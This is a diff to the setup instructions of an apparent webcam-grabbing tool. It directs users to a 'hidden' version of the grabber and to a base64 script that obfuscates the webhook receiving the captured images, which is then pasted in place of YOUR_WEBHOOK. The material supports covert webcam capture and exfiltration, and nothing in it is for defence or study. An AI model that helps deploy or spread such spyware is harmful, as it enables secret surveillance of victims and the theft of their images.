Xan0GDI/Xan0/CamGrabber/setup.md

 and also download the `base64webhookencoder.py` to obfuscate your webhook a little bit
 - This script works on windows only and it will install everything for you :) the cam.py is the "hidden" version of the cam grabber.
-  If you just want the raw cam grabbing then download `camgrabber.py`
+- If you just want the raw cam grabbing then download `camgrabber.py` Here its the same.
+Download `base64webhookencoder.py` to obfuscate your webhook a bit and then copy it into the code where it says `YOUR_WEBHOOK`